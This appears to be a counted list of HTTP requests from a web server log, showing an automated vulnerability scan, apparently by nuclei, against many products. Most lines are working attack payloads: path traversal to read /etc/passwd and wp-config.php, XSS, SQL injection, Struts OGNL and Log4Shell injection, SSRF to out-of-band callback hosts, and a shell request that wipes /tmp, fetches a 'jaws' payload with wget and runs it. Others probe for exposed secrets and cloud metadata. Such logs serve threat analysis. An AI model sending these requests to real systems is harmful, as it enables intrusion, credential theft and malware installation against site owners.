1 GET /idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https[:]//cfoshuv52mup8baf1ho0bazmhm5nodzkq[.]oast[.]fun HTTP/1.1
1 GET /images/json HTTP/1.1
1 GET /includes/mysql2i/mysql2i.func.php HTTP/1.1
1 GET /index.action?cmd=cat%20/etc/passwd&encoding=UTF-8&method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java[.]util[.]Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20 HTTP/1.1
1 GET /index.action HTTP/1.1
1 GET /index.asp HTTP/1.1
2 GET /index.html HTTP/1.1
1 GET /index.php/System/MailConnect/host/cfoshuv52mup8baf1ho0xwk7mzpyh7t6p.oast.fun/port/80/secure/ HTTP/1.1
1 GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1
1 GET /index.php/install/ HTTP/1.1
1 GET /index.php/install HTTP/1.1
1 GET /index.php?%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&action=Login&module=Users&print=a HTTP/1.1
1 GET /index.php?action=../../../../../../../../etc/passwd&option=com_agora&page=avatars&task=profile HTTP/1.1
1 GET /index.php?action=Login&module=Users HTTP/1.1
1 GET /index.php?action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&page&restore=1 HTTP/1.1
1 GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
1 GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_communitypolls HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_vjdeo HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_kp HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ckforms HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_joomlaflickr HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multiroot HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_smestorage HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_wmi HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../etc/passwd&option=com_kif_nexus HTTP/1.1
1 GET /index.php?controller=../../../../../../../../etc/passwd%00&option=com_dwgraphs HTTP/1.1
1 GET /index.php?controller=../../../../../../../../etc/passwd&option=com_cartweberp HTTP/1.1
1 GET /index.php?controller=../../../../../etc/passwd%00&option=com_canteen HTTP/1.1
1 GET /index.php?controller=CommentGrade&fc=module&id_products%5B%5D=(select*from(select(sleep(6)))a)&module=productcomments HTTP/1.1
1 GET /index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 HTTP/1.1
1 GET /index.php?folder=../../../../etc/passwd&option=com_imagebrowser HTTP/1.1
1 GET /index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1
1 GET /index.php?include_file=../../../../../../etc/passwd&option=com_pro_desk HTTP/1.1
1 GET /index.php?module=Install&view=Index HTTP/1.1
1 GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_projectfork&section=../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?p=%22alert(document.domain)%22&v=d HTTP/1.1
1 GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1
1 GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
1 GET /index.php?s=/admin/Index/index HTTP/1.1
1 GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /index_sso.php HTTP/1.1
1 GET /inizio.php HTTP/1.1
1 GET /install/?step=1 HTTP/1.1
1 GET /install/ HTTP/1.1
1 GET /install/index.php HTTP/1.1
1 GET /install HTTP/1.1
1 GET /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1
1 GET /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1
1 GET /jbossws/services HTTP/1.1
1 GET /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1
1 GET /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1
1 GET /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1
1 GET /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1
1 GET /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd HTTP/1.1
1 GET /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini HTTP/1.1
1 GET /jobmanager/logs/..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252ftmp%25252fpoc HTTP/1.1
1 GET /jolokia/exec/ch[.]qos[.]logback[.]classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1
1 GET /jolokia/read/java[.]lang:type=Memory HTTP/1.1
1 GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1
1 GET /jw/web/; HTTP/1.1
1 GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1
1 GET /karma.conf.js HTTP/1.1
1 GET /lab.html?vpath=//interact[.]sh HTTP/1.1
1 GET /lam/templates/login.php HTTP/1.1
1 GET /language/lang HTTP/1.1
1 GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1
1 GET /lib/upgrade.txt HTTP/1.1
1 GET /libs/granite/core/content/login.html HTTP/1.1
1 GET /libs/granite/offloading/content/view.html HTTP/1.1
1 GET /log/development.log HTTP/1.1
1 GET /loggers HTTP/1.1
1 GET /login.aspx HTTP/1.1
1 GET /login.do HTTP/1.1
1 GET /login.htm HTTP/1.1
2 GET /login.html HTTP/1.1
1 GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /login.php HTTP/1.1
1 GET /login.rsp HTTP/1.1
1 GET /login/ HTTP/1.1
1 GET /login/forgetpswd.php?loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&loginsys=1 HTTP/1.1
1 GET /login/login.do HTTP/1.1
1 GET /login/login.htm HTTP/1.1
1 GET /login?loginUrl=%2Findex HTTP/1.1
1 GET /login?next=\\\\\\interact.sh HTTP/1.1
1 GET /login?redir=/ng HTTP/1.1
1 GET /login?redirectTo=/ HTTP/1.1
4 GET /login HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /logon/LogonPoint/tmindex.html HTTP/1.1
1 GET /logs/development.log HTTP/1.1
1 GET /lucee/lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272Lw01c7usVasWo5bqNDWI4XDzJs%27%29%253elujb7/admin/imgProcess.cfm HTTP/1.1
1 GET /lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272Lw01c7usVasWo5bqNDWI4XDzJs%27%29%253elujb7/admin/imgProcess.cfm HTTP/1.1
1 GET /magmi/web/info.php HTTP/1.1
1 GET /mailscanner/login.php HTTP/1.1
1 GET /mainfile.php?Logon=%27%3Becho%20md5(TestPoc)%3B%27&_login=1&password=testpoc&username=test HTTP/1.1
1 GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
1 GET /man.cgi?B_mac_apply=APPLY&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port&TF_port&failure=fail.htm&http_block=0&redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&type=dev_name_apply HTTP/1.1
1 GET /management HTTP/1.1
18 GET /manager/html HTTP/1.1
1 GET /manager/login.do HTTP/1.1
1 GET /mantis/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /mantisBT/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /mantisbt-2.3.0/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /mappings HTTP/1.1
1 GET /mcmadmin HTTP/1.1
1 GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1
1 GET /mediation/authenticate HTTP/1.1
1 GET /mediation/domains HTTP/1.1
2 GET /metadata/instance?api-version=2021-02-01 HTTP/1.1
2 GET /metrics HTTP/1.1
8 GET /miscadmin HTTP/1.1
1 GET /mobile.html HTTP/1.1
1 GET /module/smartblog/archive?day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&month=1&year=1 HTTP/1.1
1 GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1
1 GET /mylittleadmin/ HTTP/1.1
1 GET /nagios3 HTTP/1.1
1 GET /nagios HTTP/1.1
1 GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
1 GET /namespaces HTTP/1.1
1 GET /navigate/login.php HTTP/1.1
1 GET /nbproject/project.properties HTTP/1.1
1 GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1
1 GET /new/newhttp[:]//interact[.]sh HTTP/1.1
1 GET /nextcloud/index.php/login HTTP/1.1
1 GET /nextcloud/login HTTP/1.1
1 GET /nginx-status HTTP/1.1
1 GET /nginx_status HTTP/1.1
1 GET /npm-debug.log HTTP/1.1
1 GET /nuxeo/login.jsp HTTP/1.1
1 GET /oam/server/opensso/sessionservice HTTP/1.1
1 GET /oauth-credentials.json HTTP/1.1
1 GET /ocsreports HTTP/1.1
1 GET /omni_success?cmdb_edit_path=\")alert('nuclei')// HTTP/1.1
2 GET /opc/v1/instance HTTP/1.1
1 GET /openapi.json HTTP/1.1
1 GET /owa/auth/logon.aspx?replaceCurrent=1&url=http[:]//13[.]67[.]44[.]234/ecp HTTP/1.1
1 GET /owa/auth/x.js HTTP/1.1
1 GET /pages/sdcall/Login.jsp HTTP/1.1
1 GET /pagespeed-global-admin/ HTTP/1.1
1 GET /passport/index.php?action=manage&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mtype=userset HTTP/1.1
1 GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1
1 GET /php/connector.minimal.php?cmd=file&download=1&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk HTTP/1.1
1 GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1
1 GET /phpMyAdmin%202/server_import.php HTTP/1.1
1 GET /phpMyAdmin/server_import.php HTTP/1.1
1 GET /phpmyadmin/server_import.php HTTP/1.1
1 GET /phpmyadmin/setup/index.php?id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers HTTP/1.1
1 GET /phpspec.yml HTTP/1.1
1 GET /phpstan.neon HTTP/1.1
1 GET /phpwiki/index.php/passwd HTTP/1.1
1 GET /phy.htm HTTP/1.1
1 GET /plc/webvisu.htm HTTP/1.1
1 GET /plugins/weathermap/configs/poc.conf HTTP/1.1
1 GET /plugins/weathermap/editor.php?action=set_map_properties&debug=existing&link_bandwidth_in&link_bandwidth_out&link_hover&link_infourl&link_name&link_target&link_width&map_legend=Traffic+Load&map_linkdefaultwidth=7&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&mapname=poc.conf&node_hover&node_iconfilename=--NONE--&node_infourl&node_label&node_name&node_new_name&node_x&node_y&param&param2&plug=0 HTTP/1.1
1 GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1
1 GET /pma/server_import.php HTTP/1.1
1 GET /pme/database/pme/phinx.yml HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /portal/displayAPSForm.action?debug=command&expression=4212*6330 HTTP/1.1
1 GET /portal/favicon.ico HTTP/1.1
1 GET /portal/images/MyVue/MyVueHelp.png HTTP/1.1
1 GET /portal/info.jsp HTTP/1.1
1 GET /portal/portalhelp/en/ HTTP/1.1
1 GET /pre-commit-config.yaml HTTP/1.1
1 GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
1 GET /printer/objects/list HTTP/1.1
1 GET /processwire/ HTTP/1.1
1 GET /proftpd.conf HTTP/1.1
1 GET /provider.tf HTTP/1.1
2 GET /prweb/PRAuth/app/default/ HTTP/1.1
1 GET /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd HTTP/1.1
1 GET /public/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
1 GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /pubspec.yaml HTTP/1.1
1 GET /qmailadmin/qmailadmin.cgi HTTP/1.1
1 GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1
1 GET /radiusmanager/user.php HTTP/1.1
1 GET /redirect-to?url=https%3A%2F%2Finteract[.]sh HTTP/1.1
1 GET /redmine/config/secrets.yml HTTP/1.1
1 GET /redoc HTTP/1.1
1 GET /remote_agent.php?action=polldata&host_id=1&local_data_ids[0]=1&poller_id=curl%20cfoshuv52mup8baf1ho0hsjifimt1ghhe.oast.fun/whoami`` HTTP/1.1
1 GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1
1 GET /responsiveUI/ HTTP/1.1
1 GET /responsiveUI/webmail/folder.xhtml HTTP/1.1
1 GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1
1 GET /rest/api/2/user/picker?query HTTP/1.1
1 GET /rest/api/latest/serverInfo HTTP/1.1
1 GET /rest/config/1.0/directory HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /roundcube/logs/errors.log HTTP/1.1
1 GET /roundcube/logs/sendmail HTTP/1.1
1 GET /s/login HTTP/1.1
1 GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1
1 GET /sap/bc/gui/sap/its/webgui HTTP/1.1
1 GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1
1 GET /sap/public/info HTTP/1.1
1 GET /schema HTTP/1.1
1 GET /search.htm?searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&searchstring2 HTTP/1.1
1 GET /search/members/?id%3D520)%2f%2funion%2f%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1` HTTP/1.1
1 GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1
1 GET /secrets.yml HTTP/1.1
1 GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /server_import.php HTTP/1.1
1 GET /service/ HTTP/1.1
1 GET /service/error/sfdc_preauth.jsp?server=http[:]//cfoshuv52mup8baf1ho0cgzrot179mweq[.]oast[.]fun%23.salesforce.com/&session=s&userid=1 HTTP/1.1
1 GET /servicedesk/customer/portal/10/user/login HTTP/1.1
1 GET /servicedesk/customer/user/login HTTP/1.1
1 GET /servlet/GetProductVersion HTTP/1.1
1 GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /settings HTTP/1.1
1 GET /setup/index.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+update[.]rawupdater[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /showfile.php?file=/etc/passwd HTTP/1.1
1 GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1
1 GET /site_admin/user/login HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.cfoshuv52mup8baf1ho0ceb3hfqrc988m.oast.fun/a%7D HTTP/1.1
1 GET /solr/admin/cores?wt=json HTTP/1.1
1 GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1
1 GET /spring-mvc-showcase/resources/%25255c%25255c..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/windows/win.ini HTTP/1.1
1 GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search&what=x&where=BODY HTTP/1.1
1 GET /src/search.php?mailbox=INBOX&submit=Search&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
1 GET /static/%25255c%25255c..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/..%25255c/windows/win.ini HTTP/1.1
2 GET /status.php HTTP/1.1
2 GET /status HTTP/1.1
1 GET /storage/logs/laravel.log HTTP/1.1
1 GET /svnserve.conf HTTP/1.1
1 GET /sysinit.shtml?r=52300 HTTP/1.1
1 GET /system/console HTTP/1.1
1 GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1
1 GET /system/login HTTP/1.1
1 GET /templates/login.php HTTP/1.1
1 GET /test.txt%250d%250aSet-Cookie:CRLFInjection=Test%250d%250aLocation:%2520interact.sh%250d%250aX-XSS-Protection:0 HTTP/1.1
1 GET /test/config/secrets.yml HTTP/1.1
1 GET /test/pathtraversal/master/..%25252f..%25252f..%25252f..%25252f../etc/passwd HTTP/1.1
1 GET /tests/Zend/Http/Client/_files/testRedirections.php?param=<img/src=x%20onerror=alert(document.domain)>&redirection=3 HTTP/1.1
1 GET /tiki-jsplugin.php?language=../../../../../../../../../../windows/win.ini&plugin=x HTTP/1.1
1 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1
1 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1
1 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
1 GET /tool/view/phpinfo.view.php HTTP/1.1
1 GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1
1 GET /ui/ HTTP/1.1
1 GET /ui/index.html HTTP/1.1
1 GET /ui/login HTTP/1.1
1 GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1
1 GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?baseUrl=http[:]//cfoshuv52mup8baf1ho0sbf3c8x8gxizo[.]oast[.]fun&section=content&tree=undefined HTTP/1.1
1 GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?baseUrl=http[:]//cfoshuv52mup8baf1ho03nwp7arj9adc7[.]oast[.]fun/&section=TryToAvoidGetCacheItem111 HTTP/1.1
1 GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?baseUrl=http[:]//cfoshuv52mup8baf1ho01fib6f341pfuo[.]oast[.]fun/&section=AvoidGetCacheItem HTTP/1.1
1 GET /umbraco HTTP/1.1
1 GET /updating.jsp?url=https[:]//interact[.]sh/ HTTP/1.1
1 GET /upgrade.php HTTP/1.1
1 GET /user.php?mod=login HTTP/1.1
1 GET /user.php HTTP/1.1
1 GET /user/login?redirect=%2F HTTP/1.1
1 GET /user_secrets.yml.old HTTP/1.1
1 GET /user_secrets.yml HTTP/1.1
1 GET /users/new HTTP/1.1
2 GET /users/sign_in HTTP/1.1
1 GET /v2/auth/roles HTTP/1.1
1 GET /var HTTP/1.1
1 GET /vendor/composer/installed.json HTTP/1.1
1 GET /vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?param=<img/src=x%20onerror=alert(1)>&redirection=3 HTTP/1.1
1 GET /verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /vpn/index.html HTTP/1.1
1 GET /vsaas/v2/login HTTP/1.1
1 GET /wan.htm HTTP/1.1
1 GET /wd/hub HTTP/1.1
1 GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1
1 GET /web-console/ServerInfo.jsp HTTP/1.1
1 GET /webadmin/ HTTP/1.1
1 GET /webadmin/reporter/view_server_log.php?act=stats&count=1000&filename&filter&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=1&offset&server=localhost&sortitem&sortorder HTTP/1.1
1 GET /webalizer/ HTTP/1.1
1 GET /weblogin.htm HTTP/1.1
1 GET /webpack.config.js HTTP/1.1
1 GET /websso/SAML2/SSO/vsphere.local?SAMLRequest HTTP/1.1
1 GET /wifi_base.shtml HTTP/1.1
1 GET /wlsecurity.html HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=directorist_author_pagination HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1
1 GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1
1 GET /wp-admin/admin-ajax.php?callback=jQuery&fn=../../wp-config.php&jvfrm_spot_get_json HTTP/1.1
1 GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1
1 GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1
1 GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http[:]//cfoshuv52mup8baf1ho0jk56ydjc5h5wi[.]oast[.]fun HTTP/1.1
1 GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1
1 GET /wp-admin/index.php HTTP/1.1
1 GET /wp-cli.yml HTTP/1.1
1 GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1
1 GET /wp-content/plugins/activehelper-livehelp/server/offline.php?BCC=BCC&COMPANY=COMPANY&COMPLETE=COMPLETE&DOMAINID=DOMAINID&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PHONE=PHONE&SECURITY=SECURITY&SERVER=SERVER&TITLE=TITLE&URL=URL HTTP/1.1
1 GET /wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/all-in-one-wp-migration/readme.txt HTTP/1.1
1 GET /wp-content/plugins/antispam-bee/readme.txt HTTP/1.1
1 GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/astra-sites/readme.txt HTTP/1.1
1 GET /wp-content/plugins/autoptimize/readme.txt HTTP/1.1
1 GET /wp-content/plugins/backwpup/readme.txt HTTP/1.1
1 GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1
1 GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https[:]//interact[.]sh/ HTTP/1.1
1 GET /wp-content/plugins/cab-fare-calculator/tblight.php?action=1&ajax=1&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1
1 GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1
1 GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /wp-content/plugins/classic-widgets/readme.txt HTTP/1.1
1 GET /wp-content/plugins/cloudflare/readme.txt HTTP/1.1
1 GET /wp-content/plugins/cmb2/readme.txt HTTP/1.1
1 GET /wp-content/plugins/code-snippets/readme.txt HTTP/1.1
1 GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1
1 GET /wp-content/plugins/cookie-notice/readme.txt HTTP/1.1
1 GET /wp-content/plugins/count-per-day/download.php?f=/etc/passwd&n=1 HTTP/1.1
1 GET /wp-content/plugins/creative-mail-by-constant-contact/readme.txt HTTP/1.1
